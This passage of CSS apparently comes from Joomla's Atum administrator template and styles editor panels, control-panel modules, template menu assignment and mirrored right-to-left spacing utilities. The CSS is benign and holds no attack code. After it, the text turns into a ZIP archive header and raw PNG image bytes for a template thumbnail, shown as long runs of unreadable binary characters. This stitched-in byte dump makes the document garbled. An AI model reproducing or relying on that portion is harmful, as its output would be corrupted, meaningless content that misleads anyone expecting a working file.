  width: 1%;
}

.w-3 {
  width: 3%;
}

.w-5 {
  width: 5%;
}

.w-6 {
  width: 6%;
}

.w-7 {
  width: 7%;
}

.w-10 {
  width: 10%;
}

.w-12 {
  width: 12%;
}

.w-15 {
  width: 15%;
}

.w-20 {
  width: 20%;
}

.w-30 {
  width: 30%;
}

.w-35 {
  width: 35%;
}

.w-40 {
  width: 40%;
}

.w-60 {
  width: 60%;
}

.w-80 {
  width: 80%;
}

.editor-xtd-buttons .btn {
  margin-bottom: 5px;
}

.CodeMirror-fullscreen {
  top: 63px;
}

.gu-mirror {
  position: fixed !important;
  z-index: 1060 !important;
  display: table;
  margin: 0 !important;
  cursor: move;
  background-color: #20c997;
  opacity: 0.8;
}
.gu-mirror td, .gu-mirror th {
  background-color: #20c997;
}

.js-draggable .sortable-handler {
  cursor: move;
}

.editor .toggle-editor {
  margin-top: 1rem;
}
.editor .mce-tinymce {
  border: 1px solid var(--template-bg-dark);
}
.editor .mce-btn,
.editor .mce-panel {
  background: var(--white-offset);
}

.container-main .mce-panel {
  background: transparent;
  border: 0;
  box-shadow: none;
}
.container-main .mce-top-part {
  margin-bottom: 1rem;
}
.container-main .mce-top-part::before {
  box-shadow: none;
}
.container-main .mce-menubar .mce-menubtn {
  background-color: #fff;
}
.container-main .mce-flow-layout-item {
  margin: 2px 8px 2px 0;
}
.container-main .mce-btn-group:not(:first-child) {
  margin-right: 6px;
  margin-left: 0;
}
.container-main .mce-btn-group .mce-btn {
  margin: 0 1px 0 0;
}
.container-main .mce-statusbar .mce-container-body {
  background-color: #fff;
  border-top: var(--template-bg-light) 1px solid;
}

.com_config #fieldset-permissions {
  grid-template-columns: 1fr;
}
.com_config #page-filters .form-select, .com_config #page-filters .custom-select {
  width: auto;
}
.com_config .tab-description {
  grid-column: 1/-1;
}
.com_config .options-menu .revert-controls .controls {
  -webkit-margin-start: 0;
          margin-inline-start: 0;
}

.com_content.layout-edit joomla-field-media .field-media-preview {
  height: 10.25rem;
}
.com_content.layout-edit joomla-tab #attrib-basic[active],
.com_content.layout-edit joomla-tab #editor[active] {
  display: flex;
  flex-wrap: wrap;
}
.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group,
.com_content.layout-edit joomla-tab #editor[active] .form-group {
  flex: 0 0 50%;
  max-width: 50%;
  box-shadow: none;
}
.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:nth-child(1), .com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:nth-child(19),
.com_content.layout-edit joomla-tab #editor[active] .form-group:nth-child(1),
.com_content.layout-edit joomla-tab #editor[active] .form-group:nth-child(19) {
  flex: 0 0 100%;
  max-width: 100%;
}
.com_content.layout-edit joomla-tab #attrib-basic[active] .field-spacer,
.com_content.layout-edit joomla-tab #editor[active] .field-spacer {
  flex: 0 0 100%;
  max-width: 100%;
}

.cpanel-add-module-icon-help .list-group-item, .cpanel-add-module-icon-system .list-group-item,
.com-cpanel-help .list-group-item,
.com-cpanel-system .list-group-item {
  padding: 0;
}
.cpanel-add-module-icon-help .list-group-item a, .cpanel-add-module-icon-system .list-group-item a,
.com-cpanel-help .list-group-item a,
.com-cpanel-system .list-group-item a {
  display: block;
  padding: 0.75rem 1rem;
}
.cpanel-add-module-icon-help__header,
.com-cpanel-help__header {
  color: var(--template-special-color);
}
.cpanel-add-module-icon-help a,
.com-cpanel-help a {
  color: var(--template-link-color);
}
.cpanel-add-module-icon-help h2, .cpanel-add-module-icon-help .h2,
.com-cpanel-help h2,
.com-cpanel-help .h2 {
  font-size: 1rem;
}
.cpanel-add-module-icon-system,
.com-cpanel-system {
  -webkit-column-count: 4;
     -moz-column-count: 4;
          column-count: 4;
}
.cpanel-add-module-icon-system__category,
.com-cpanel-system__category {
  margin-bottom: 1.5em;
  page-break-inside: avoid;
  -webkit-column-break-inside: avoid;
     -moz-column-break-inside: avoid;
          break-inside: avoid;
}
.cpanel-add-module-icon-system__header,
.com-cpanel-system__header {
  color: var(--template-special-color);
}
.cpanel-add-module-icon-system__header span,
.com-cpanel-system__header span {
  margin-right: 5px;
}
.cpanel-add-module-icon-system a,
.com-cpanel-system a {
  color: var(--template-link-color);
}
.cpanel-add-module-icon-system h2, .cpanel-add-module-icon-system .h2,
.com-cpanel-system h2,
.com-cpanel-system .h2 {
  font-size: 1rem;
}
@media (max-width: 991.98px) {
  .cpanel-add-module-icon-system,
.com-cpanel-system {
    -webkit-column-count: 2;
       -moz-column-count: 2;
            column-count: 2;
  }
}
@media (max-width: 767.98px) {
  .cpanel-add-module-icon-system,
.com-cpanel-system {
    -webkit-column-count: 1;
       -moz-column-count: 1;
            column-count: 1;
  }
}

.com_cpanel .content {
  margin-top: 2rem;
}
.com_cpanel .card p:last-child {
  margin-bottom: 0;
}
.com_cpanel .card .list-group,
.com_cpanel .card .table {
  padding: 0;
  margin-bottom: unset;
}
.com_cpanel .card-header {
  display: flex;
  align-items: center;
  padding: 1rem 1rem 0.75rem;
  font-weight: 700;
  color: var(--template-bg-dark);
  background: var(--card-bg);
}
.com_cpanel .card-header > [class^=icon-],
.com_cpanel .card-header > img {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}
.com_cpanel .card-header .btn {
  margin-top: 0.25em;
  margin-bottom: 0.25em;
}
.com_cpanel .card-body {
  padding: 0;
  overflow: hidden;
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.com_cpanel .module-actions {
  order: 1;
  -webkit-margin-start: auto;
          margin-inline-start: auto;
}
.com_cpanel .module-actions > * {
  padding: 0;
  color: var(--template-bg-dark-70);
}
.com_cpanel .cpanel-add-module {
  display: flex;
  flex-direction: column;
  align-items: flex-start;
  justify-content: flex-end;
  width: 100%;
  min-height: 130px;
  padding: 0 1rem;
  font-size: 0.875rem;
  font-weight: 700;
  line-height: 1;
  color: hsl(var(--hue), 30%, 40%);
  background-color: hsl(var(--hue), 35%, 98%);
  border: 1px solid hsl(var(--hue), 35%, 88%);
  border-radius: 0.25rem;
  transition: all 0.15s ease-in;
}
.com_cpanel .cpanel-add-module:hover, .com_cpanel .cpanel-add-module:focus, .com_cpanel .cpanel-add-module:active {
  color: #fff;
  text-decoration: none;
  background: var(--template-bg-dark);
}
.com_cpanel .cpanel-add-module > span {
  padding: 0.25rem 0 1rem;
}
.com_cpanel .cpanel-add-module .cpanel-add-module-icon {
  font-size: 2rem;
  color: hsl(var(--hue), 30%, 40%);
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.cpanel-modules .list-group {
  border-top: 1px solid hsl(var(--hue), 40%, 85%);
}
.cpanel-modules .list-group-item:hover {
  background: var(--toolbar-bg);
}
.cpanel-modules .list-group-item a {
  font-weight: 500;
  text-decoration: underline;
}
.cpanel-modules .list-group-item .btn {
  text-decoration: none;
}
.cpanel-modules .list-group-item .list-group-item a > span[class^=icon-], .cpanel-modules .list-group-item .list-group-item a > span[class*=" icon-"], .cpanel-modules .list-group-item .list-group-item a > span[class^=fa-], .cpanel-modules .list-group-item .list-group-item a > span[class*=" fa-"] {
  display: block;
  padding: 0.5rem;
  color: rgba(255, 255, 255, 0.9);
  background: var(--template-link-color);
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}
.cpanel-modules .list-group-item .list-group-item a > span[class^=icon-]:hover, .cpanel-modules .list-group-item .list-group-item a > span[class*=" icon-"]:hover, .cpanel-modules .list-group-item .list-group-item a > span[class^=fa-]:hover, .cpanel-modules .list-group-item .list-group-item a > span[class*=" fa-"]:hover {
  background: var(--template-link-hover-color);
}
.cpanel-modules .list-group-item span.home-image[class^=icon-], .cpanel-modules .list-group-item span.home-image[class*=" icon-"], .cpanel-modules .list-group-item span.home-image[class^=fa-], .cpanel-modules .list-group-item span.home-image[class*=" fa-"] {
  display: inline-block;
  padding: 0;
  margin: 0 0.85rem;
  font-size: 0.9rem;
  color: #010101;
  background: var(--white-offset);
  box-shadow: none;
  -webkit-transform: scale(1.2);
          transform: scale(1.2);
}
.cpanel-modules h2, .cpanel-modules .h2 {
  margin-bottom: 0;
  font-size: 1rem;
}
.cpanel-modules .mod-custom {
  padding: 1rem;
}

.sample-data .list-group-item {
  padding: 1rem;
}

.sample-data__title {
  font-weight: bold;
  color: var(--primary);
}

.sample-data__icon {
  width: 1.3rem;
  text-align: center;
}

.sample-data__desc {
  -webkit-border-start: 4px solid hsl(var(--hue), 50%, 93%);
          border-inline-start: 4px solid hsl(var(--hue), 50%, 93%);
  -webkit-padding-start: 1rem;
          padding-inline-start: 1rem;
  -webkit-margin-start: 8px;
          margin-inline-start: 8px;
}

.com_joomlaupdate caption {
  caption-side: top;
}

.new-modules .card-columns {
  grid-template-columns: repeat(auto-fill, minmax(240px, 1fr));
}

.new-module {
  display: flex;
  overflow: hidden;
  color: hsl(var(--hue), 30%, 40%);
  background-color: hsl(var(--hue), 60%, 97%);
  border: 1px solid hsl(var(--hue), 50%, 93%);
  border-radius: 0.25rem;
}
.new-module * {
  transition: all 0.25s ease;
}
.new-module-details {
  flex: 1 0;
  padding: 1rem;
}
.new-module-title {
  margin-bottom: 0.25rem;
  font-size: 1rem;
  font-weight: 700;
}
.new-module-caption {
  display: box;
  margin: 0;
  overflow: hidden;
  font-size: 0.875rem;
  /* stylelint-disable property-no-unknown */
  box-orient: vertical;
  -webkit-line-clamp: 3;
}
.new-module-link {
  display: flex;
  align-items: flex-end;
  justify-content: center;
  width: 2.5rem;
  font-size: 1.2rem;
  background: hsl(var(--hue), 50%, 93%);
}
.new-module-link span {
  margin-bottom: 10px;
  color: hsl(var(--hue), 30%, 40%);
}
.new-module:hover .new-module-link {
  background: var(--template-bg-dark);
}
.new-module:hover .new-module-link span {
  color: #fff;
}

.com_tags #fieldset-image-intro > div,
.com_tags #fieldset-image-fulltext > div {
  grid-template-columns: 1fr;
}
@media (min-width: 768px) {
  .com_tags #fieldset-image-intro,
.com_tags #fieldset-image-fulltext {
    display: inline-block;
    width: calc(50% - 15px);
  }
}
.com_tags #fieldset-image-intro {
  -webkit-margin-end: 15px;
          margin-inline-end: 15px;
}
.com_tags #fieldset-image-fulltext {
  -webkit-margin-start: 15px;
          margin-inline-start: 15px;
}

.tbody-icon .icon-download,
.tbody-icon .fa-download {
  color: var(--success);
  border-color: var(--success);
}
.tbody-icon .icon-mail,
.tbody-icon .fa-mail {
  color: var(--primary);
  border-color: var(--primary);
}
.tbody-icon .icon-delete,
.tbody-icon .fa-delete,
.tbody-icon .icon-times,
.tbody-icon .fa-times {
  color: var(--danger);
  border-color: var(--danger);
}

.com_templates .menu-assignment {
  position: relative;
}
.com_templates .menu-assignment .menu-links {
  padding-left: 0;
  margin-top: 15px;
  margin-left: 0;
  -webkit-column-count: 3;
     -moz-column-count: 3;
          column-count: 3;
  -webkit-column-gap: 15px;
     -moz-column-gap: 15px;
          column-gap: 15px;
}
@media (max-width: 991.98px) {
  .com_templates .menu-assignment .menu-links {
    -webkit-column-count: auto;
       -moz-column-count: auto;
            column-count: auto;
  }
}
.com_templates .menu-assignment .menu-links > li {
  display: inline-block;
  width: 100%;
  margin-bottom: 15px;
  vertical-align: top;
  list-style: none;
  -webkit-backface-visibility: hidden;
          backface-visibility: hidden;
  page-break-inside: avoid;
  -webkit-column-break-inside: avoid;
     -moz-column-break-inside: avoid;
          break-inside: avoid;
}
.com_templates .menu-assignment .menu-links-block {
  padding: 15px;
  background-color: var(--card-bg);
  border: 1px solid #dee2e6;
  border-radius: 3px;
}
.com_templates .menu-assignment label {
  display: block;
  padding: 3px 0;
  font-size: inherit;
}
.com_templates .menu-assignment label input {
  position: relative;
  -webkit-margin-end: 5px;
          margin-inline-end: 5px;
}

.com_users.view-debuggroup thead th, .com_users.view-debuguser thead th {
  white-space: normal;
}
.com_users.view-debuggroup .legend, .com_users.view-debuguser .legend {
  margin: 1rem 1rem 0;
}
.com_users.view-mail .form-control {
  max-width: 100%;
}
.com_users #fieldset-groups .controls {
  -webkit-margin-start: 2rem;
          margin-inline-start: 2rem;
}

@media (prefers-reduced-motion: reduce) {
  *, ::before, ::after {
    background-attachment: initial !important;
    transition-delay: 0s !important;
    transition-duration: 0.001ms !important;
    -webkit-animation-duration: 1ms !important;
            animation-duration: 1ms !important;
    -webkit-animation-delay: -1ms !important;
            animation-delay: -1ms !important;
    -webkit-animation-iteration-count: 1 !important;
            animation-iteration-count: 1 !important;
    scroll-behavior: auto !important;
  }
}
.float-start {
  float: right !important;
}

.float-end {
  float: left !important;
}

.modal-header .btn-close {
  margin: -0.5rem auto -0.5rem -0.5rem;
}

.text-start {
  text-align: right !important;
}

.text-end {
  text-align: left !important;
}

.me-0 {
  margin-right: auto !important;
  margin-left: 0 !important;
}

.me-1 {
  margin-right: auto !important;
  margin-left: 0.25rem !important;
}

.me-2 {
  margin-right: auto !important;
  margin-left: 0.5rem !important;
}

.me-3 {
  margin-right: auto !important;
  margin-left: 1rem !important;
}

.me-4 {
  margin-right: auto !important;
  margin-left: 1.5rem !important;
}

.me-5 {
  margin-right: auto !important;
  margin-left: 3rem !important;
}

.me-auto {
  margin-right: 0 !important;
  margin-left: auto !important;
}

.ms-0 {
  margin-right: 0 !important;
  margin-left: auto !important;
}

.ms-1 {
  margin-right: 0.25rem !important;
  margin-left: auto !important;
}

.ms-2 {
  margin-right: 0.5rem !important;
  margin-left: auto !important;
}

.ms-3 {
  margin-right: 1rem !important;
  margin-left: auto !important;
}

.ms-4 {
  margin-right: 1.5rem !important;
  margin-left: auto !important;
}

.ms-5 {
  margin-right: 3rem !important;
  margin-left: auto !important;
}

.ms-auto {
  margin-right: auto !important;
  margin-left: 0 !important;
}

.pe-0 {
  padding-right: 0 !important;
  padding-left: 0 !important;
}

.pe-1 {
  padding-right: 0 !important;
  padding-left: 0.25rem !important;
}

.pe-2 {
  padding-right: 0 !important;
  padding-left: 0.5rem !important;
}

.pe-3 {
  padding-right: 0 !important;
  padding-left: 1rem !important;
}

.pe-4 {
  padding-right: 0 !important;
  padding-left: 1.5rem !important;
}

.pe-5 {
  padding-right: 0 !important;
  padding-left: 3rem !important;
}

.ps-0 {
  padding-right: 0 !important;
  padding-left: 0 !important;
}

.ps-1 {
  padding-right: 0.25rem !important;
  padding-left: 0 !important;
}

.ps-2 {
  padding-right: 0.5rem !important;
  padding-left: 0 !important;
}

.ps-3 {
  padding-right: 1rem !important;
  padding-left: 0 !important;
}

.ps-4 {
  padding-right: 1.5rem !important;
  padding-left: 0 !important;
}

.ps-5 {
  padding-right: 3rem !important;
  padding-left: 0 !important;
}

.input-group:not(.has-validation) > :not(:last-child):not(.dropdown-toggle):not(.dropdown-menu),
.input-group:not(.has-validation) > .dropdown-toggle:nth-last-child(n+3) {
  border-top-right-radius: 0.25rem;
  border-bottom-right-radius: 0.25rem;
}
.input-group.has-validation > :nth-last-child(n+3):not(.dropdown-toggle):not(.dropdown-menu),
.input-group.has-validation > .dropdown-toggle:nth-last-child(n+4) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group > :not(:first-child):not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback) {
  margin-left: -1px;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group > :last-child:not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback) {
  margin-left: -1px;
  border-top-left-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}

dl,
ol,
ul {
  padding-right: 0;
}

.dropdown-menu-end::after {
  right: auto;
  left: 0.9rem;
}

.sidebar-wrapper {
  right: 0;
  left: auto;
}

.menu-collapse {
  right: 0;
  left: auto;
  margin-right: -7.5px;
  margin-left: 0;
}

.field-calendar {
  float: none;
}

.form-text {
  float: right;
}

.field-user-wrapper {
  float: none;
}

.menu-quicktask,
.menu-badge {
  float: left;
}

#jform_new_url,
#jform_old_url,
#new_url {
  text-align: left;
}

#jform_dbprefix {
  text-align: right;
  direction: ltr;
}

.skip-to [role=separator] {
  text-align: right !important;
}

.input-group > .form-control:not(:last-child),
.input-group > .form-select:not(:last-child),
.input-group > .custom-select:not(:last-child) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-top-right-radius: 0.25rem;
  border-bottom-right-radius: 0.25rem;
}

.btn-group > .btn:first-child:not(.dropdown-toggle) {
  border-top-right-radius: 0.25rem;
  border-bottom-right-radius: 0.25rem;
}

.btn-group > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group > .btn-group:not(:last-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  margin-left: -1px;
}

.btn-group > .btn:last-child:not(.dropdown-toggle) {
  border-top-left-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.btn-group > .btn:not(:first-child),
.btn-group > .btn-group:not(:first-child) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}PK!Wd�4�4atum/template_thumbnail.pngnu&1i��PNG


IHDR�f�N��iCCPsRGB IEC61966-2.1(�u��KA���'&�����!�*JT�XD|�Z$'�I�\"�q�EDl[AA��U�_��`-�"��`�h��K���Yf�������V�Zƪ@&�7�c!e6:��=SC-���i�1U�hw��x��Ԫ|�_�,&,
\��C�a�Dž'W���­Z*�(|*�7�·�/���9l��ap7+�_��Z�����e����}��xٙ���v,ŒBa��	�ˠ�A��GVT���I�&��*&K$I��/�TOH�EO�H���o_-���T���'�~넺-(l��m���.������Y�|�дg�e-���`��XQ�w�:��@cZ��a�Գ�}��A]�����=��M�C�g֩���	pHYs���+ IDATx��g�e�u�KsݳU�|{?�g�3�H$���Xi�\jw#��RP�2���T(�An#6B&6beW�A.�\�$X� ����`0~z�w�}��k2S�+�]U�]���{��]U��w3�y2��?���k��楷D��� B�۟���R.�_����^x-�`�V!I3JQ�r�C����w���C�TH����8&K�]p��!%�w2ж�.�!�q� �)�/~��5�%���,��9&�
���^��|��RP�5dq�4���h��hOk>�SL�U��#��?�*�^��X�^@n��f9���B`�C+� ������Ĺ�/D��s��1l6��רD>H��x��arÁ�)��1�1V��ٌN����@HAhVZ���a�����ă�, p6Gi������4�Z��C��1Q/#�]Y�T�pN��8�1�"()�=EnI���,�{
���Q���r��q��Z	2c�Rb,h�B`�!�‘����,IX��.ݥ+8|�CsS\_�"��T�!I�#��X����9�-�
�g�Wߧ�x���I�0��\�k� @JQ�5�K,]x�<~��/y9�֘F�b\)�B��9YnPR��������m�����Z�s<��	�-.c�!�5�=~���_e�Z���2���Y~��9f��W�:�s����rmq�^��s���8���_�s>�c���+��1����/}�|�Ǟ�����D�„^"0�E
K3N���|���q(�M<��Y���_�%=�2Y�r�u�L(����a��EgN�39�����
gC
E�,Xj'L���u2��>a٧VX^�se9�u�B)>��g�{)���?�ڌ�3V��cɝ�CQ�j� C�>�nB�,��GHI���9Džˋ$IL�:O=q�_������$���}��|ڝ��R�%|Oq��2/��dq��j��dD�\@�	N>D FI�p�����|�<K��������䩓jT��	ByTJ�4�8wi��sӼ��a�T����cL��=8C���ȁi�jj��,���ӏ��y��,6;�}�z��J��b��X<X^^���h.-��ڼ�����، ��R��K����b�B_���X�c����=�����0��\1Kk%מ���i�$ O���9^����F8{��߿
�����ZW�$R���XK2B(_���
��̯�Xj�HցD d1#!p�X-���~
�5Y�����^�����)�X޹4���Z˅�.0��(��e�<��Z��j�����1���b�E��N�4��W�E��4���6��.�NJQ�nY���$�q�P�o��_�5��&�s���ssWۥ�b_I-�R�F�;��C1Гn����*ㄕ��}���A���V���ZcG}3YJek�[ޛ��Ag���FIe�~T��1t/�
zT�%���e�}�4ک��Ofy�}�'���?
}����t�j��
wae@c7���̓�t�ߗP�GP���Kשּׂ�x�P.E���c�쬣����%�p	��)j��=(%)�b�U4���9:S�/�^��B�O<5E����Z٣�h)��=�ݔ�8��)W�����ϝ%�jm﹏}�%\>�� FK����Wy�j��}rc9{|��Z@�Z��w��mD�U|����$ �8�^_=���(b+����9�����_z O�֋�B	�Z!�*r7prc���)����9�̬	��
b[�<�.��f
�=���N��ﯙ������j!�A����SxZ��9BJ:��5�4c�fTJ!H�������C���e����`��:�s��!0��>�$#�2��()��b����n�r�~�<��*�^BУQ�0w��п�k?bXX����}~�S���$8�|"&�y�ͷ)E�AJ)�q֒e�h�ՙ��7���¥�|�G��ӟx�F�����-����Y~����o��r��̤dY�R�A�ҨWq��>�4��WJ,7;�s���^�M�AKE�����s����0��Y*Q��n�O�f�ի\]\aee	O)�1xQ���B�-�K��"���{���*����:�M�$��H)�$*�
�V��&�
o�R�YN�f�fg���9��X5������uA�׺[�ܣ�Un���n��K�TP��x�&I3������t(�@�!y�Q�2�Rci���~M���a���/>(�F�z{��Np��a�b����ю�m=ȕRkzG�oMo� qkM��4��90�[�'ISj�2Y�ߴ����:�>R
�A��i�&cXXZ��V�!vqx��
�Q�	����X�k��X��R���|M�����s2�v=!�y�ލ/�XG�v��M"O�p$�i;�'���5��Nډ|�����:���~����y��~���ˍR�[�\�����Q�s3�h�y��&��[��ϳ�j�?�_�ug�k�\5�
��(�ٝ&�ۼb��L!ص��n�V�~C�
!����=���z�U¢{@�l
p��U�����&� �?|=ܗy�&�s���/������v�����iF��n�ק��L7j;n�N�&	?z�8y���f�w���T�����(�j�y���:s|��g�e~�I�R����`��e9��M�jՑ���ʵy���	yn��r��]�x���ԏ��߸�w�<�շ��W���ʀO�=�٧�d�^ޕ>�����O��}�����z�싣�9���'6��S'y����I[7��^z�';���\�#ϜY;�{���w��X��/|�<y��V�4��[���e*�*��/~���~�`5�A#M3��>��O�O2Vڻ)�c�^��^{�_CKDA�������C��3]�n�n���k���ƕ�ez�t$�8���_��
?z�<��'ߦ?��RI�y���
#)G���'��̓g��w��ť&��W>�r��J�M��/,�{;D� |�|�}f�'�;���A���WB����,6{����4��{��-�j��<�B�Z��Ah����בR2=1v_�q�C5
x��5>��q�
���@�;�J��&�d�V�ۯ�ˁ�i�����s�f��.��I҄��~)%Y����
��>�N��ă/��&�x���L�V�:~��w� �Z�0���{��1�L�Q�S�v�O�V%IR�V(��\��)���U�g?�~�9���E0��(V1Ok���VE۷���<'�-��փ�Z��o��'�=�g�TD��ۋBy����wO�c����0ЮT��F`^�R�̓�9}��r	�,� AJ����Z>:[pӴVh���.�����p�s� ��_���X\n���jw��|��߉�w޿Dj��',W8~p����
�ZΝ���J��>�xy]��$��ei�Isy�J��у3���n����^�50|��I���^�7߻���f��cr:�-�		�p�Je;yx���w�s�:|���֙:�>�A���&�I���n��� �-H��c���� Zi�X\n��'h%h��q�4J�.�n���÷ϣ�xZc�b��OR�4�B��:��V<����$tw�PH�b���Q B�>�������
B����6��Rđ��(!HM�W� ���X�����~p��A
�Wē;�ܐf�XJQX�os��ur�yǷ��X�ǃ(��Zi�R�Y��v�Q.E�4��jU�(*����H#`>aȓ'����$�Yn�֑�p�Z�T�;L+����O|��8v� 𥯂�O�����R�P!�=;P)��_\�7���F���#�B�x�����/�<�V���w�Ŗ�;RJ��-V�.�Q���8S�xX}h�9�TT�E;7k8;i�
q`n}���AJE��3��V��Q���`b�-�̊��G��y%����N�W�U�RA7򴇧=J�9��{LJqo���:����L��۹�V������\k�9rh��~�7�9�ko�C�ߧ1VG)E��z}�s��G<H(�"��n�ɍa���ni�ڴ;�mU�z��~�Z��l\	wW��o�N9�m����s��^I��5��?�U5��1f�A)N~�g](���f>����&�bf�$h�����n�c�XMdz~�S�itv���Xխ�q�����#��|�p�I�9`�9�c�ը�v���xR0��q{�s��X�&

�ƌp��(b�)��q����ǝC0��la��J)�?�O>v�o}�,.5y��ǹ:�����`��KW0w�g�&€�����$�^�/��ol��0���v�j��X?�O�s���~C��ma��7�6L)%9��i~�?�r�������s3�ă�N�Ǖ���s�h�[�|���9VZm�-L��Zz�$-�W)�G�j�Z|��7iLL���G�F���;�9~t��m��IZ�?��Q��k�1�"7B����8)����`�SF��t�v�������o��.Y�����>��]i��OJ����l�~�|�XY����~�#;��s'��-V-Ҕ� �k��?�3�(�R���?�k����-�ƀ�N�͟󛔪uz<ql��Y�0=3
�pa�š�:BHfgg�U?p���s�荷����_��g�Q�2`j����'VfI�=��I��_�IJ�hfD!�~����=�
809ְ-_���H%G�"/7���)N?B���+ Z�^��V�X\Z�Ӌ� j-����ǩl�Q�
�>���^g~q�g�:��2A�ɍ��܅���X.�8��IҼh��3GF�N���CLON0;Ygf�qڟ���R���������1>�R�cG�����Bp`n��t����Z��G8}�(�֊3'�q����t{\��@<��K)�X�B�y�:=&�!��avz��23I�e��v7�\
�*�P��G(E�&"�`0���񡳏�5t�}|����#t+8وXB�{��m��ng+h���K��2�af���/�ʰS�Y��AN��V��_��:�ȭe�R�3/>���Z����,'�[n�C�>����
��^y�m�5�+�y68WZ��<�d�攣���S<q�zF�,�Iq�f�|

�hۑ��� 5����P�ۆzk���Nqp��ă�dc��}�ő�3;3���ݑ oD����'NrVi��,ns3S��L�t{1�J��V�݆�GkO�_zѭ��B��D��'��[���8x`�n���l߿��Z�v��a*`%��d���LO�oWM�rC�T����EE
��x��d�F���Z���(�3"�w���Q�#�[�
vZɳO=ƿ�w�&��?���wx�Cϒ�E��o���4��3%���ɼ9Ƚ��M���Rq��)Y����P.�rf��=3[��3����xi�NL�"�v?$����A9��c�?�Deg�໅v����o�_���o�w�~<�+_�0�1�ҿ猉����#�l�|Bl�r6狯�s�{��	~��g>=�A%��|�s��qh��f��z��x��+t�a�:K�<����v�qm~��Kk�ť�7�!6���q�b��@Hř�S��o}�J4�Tuv$3�s��x�$Kid�d&���a�]�Y\���������)��A��=�:Vi�:zq��n^�6��/�}|	��n�c	!�w�q���n!��=yTH>��q�>K'�"��8����-D�%\%�$I��|>|�t�ksXgq�
0�^ɔ�\eb�/�;��-����4	��
�CJM���R&a��<�0aǼe�Cs3D��eR���K�kPF����e��<H�BP.Uhv[TK�q� ��%=������f�'n�!�h�,�c�a>[""|%A�=��8�0���<arhj���\����b����7.�#����(Y�Ö*@؄^�za2���s���	�&fv,$\@6⥗�?*��֒�=��Q*��'=�4�"9q�$Ǐ�>�>P,//�_��g?��C�[�nJi�aH��!tQ38a�R��)%�PA�u�-�|h(�0��k��wE��
���~@��(���*�r����UDI),g	��SU&�k�8�S�0�EIE�$�R�lh��Ρfy���qRb�#�uK%��%�I�CP��~
��
|�s?����!J(��ʉ��-�37�9;>��#�=���ꐢ��rdz{J�sX��0=v�Ս��d,�B#����ю�b�ު��N񛱧���Z ;���0���Y�l�B��fu_}/ርH��~�6��=! �9���s�a���gy>R����]+�w�9Q�	�J��E��:����FJ���iRa׬X�Yr���#e%���'d��1��
i��k�r9$�r�4%�B�0eh�f  Is*��<��xP�~�O���+=�(b�B_��G��gO=�=��S#���y�;1'��΅+�\o�Bc�]�����/$�%Tj%O���d�3Ϝ��#f�Ώ�S���-K���	���W�WJ�g-�3x�^xT���3'huzԫe�($=�2HdNp���A�ւkKfGʢ�t�� �el��V���v�f�pe���壽U��s�o��m:�u.u����Osh� %��}lƞ�(
�%��v8t��Ub������}�L;��e�l��ݍ����giw7���ޢ�PnR��.st�#h����N�����9Hs��b��.'IZBߑ:��S�j5:��cabb��f�^$�y�5(Wk�-�$E*� H)K�\�9���A�I�]<�a�`bz���k8[u�19� ��इ�
6�q�P�M���
��X���%�c�Z"��LO��+���6n��vl�4O��N��7�H�W�g���;ƞ�Ux���yX���D`��E!~RvgRzxAH}L���?�S���)A{>�R�$M1���h?`rf��\��06�@XH���P�Z���T
�PJ�CX��z�!,�8+(�"ʕ�~�O��6 �� ��Q��B�ę�4*�xʣ��G��!���AI���0&�:PCgm�gDAD0��Â=) ��+���hL���Bm|�,��� 2���Ex++$�~�N��V�R�ʥ��I
��j �؜� #�4��"�%�@�I�c3H��
z��t��cH2�B�V�^IF��0�/��~��R�S�P�$}޽z����4�.�G+�TD�Raa�:%?"���:��:I�/%RirS�1�M,�C��% �hИ��Z�b���|�q��3�s \Q�YH�^55�H)p�"����X�VBH��M�9�sڝ.Jk*�������P8�@YKR���,��"��0���)W+�]ʻ\�n��;=,� ��!��S>Z)�1|�1o)f�򢌁T��T��o�{{{J@,P���������-+��g�껓1�V+����F"Q���C	��!�S%�Q�/wg��{͍���5�F��5����8��ц�nXC������ku�#F
��jY.Wؽ! Z	|��]�o��f�A�m:.�*!�0 ��9�4g�j�ң5�G1����'d.^!�0٨c�Ay>X�59J{��QA�v�4Mi��K�Zդ<7kh���k5�3D��)8?*����7��X��l��^����=�g?��!��W�Vg�ǝc;�מ���&��Z^{�-���ӡ:�Wb�e�,c�Q�X��.^"҆R��|k�t�L9�\�o���96�O~�c�8�������LM2Xr��)�#._���"��9ʁw�
����Z:��|p{J@�~�q:��r���I�$'Pҁ���-�ej���y<��	��iJ/�F�D��|T+�4G{��}�v��<�	W�:k��'��W�-Hu�dY�q6�Xi�Xjv8zh9dOl��%��T�$E͆�
�X|BB4;�s=,o���rX�w#��!� �4B
D��<+
K��z�2��8�������~/�?��~�n�l:.�`rl��l����s\�o��T&��3�,���=�9�N�����T'�a�s��W���^�~��98�5�aO	��B>����IDAT���ĉ�W��s$V�lN�V���I�N0>^�����ȗ[���~�Ē$�p�6�J�D��'Ж������al���[~~3�$�
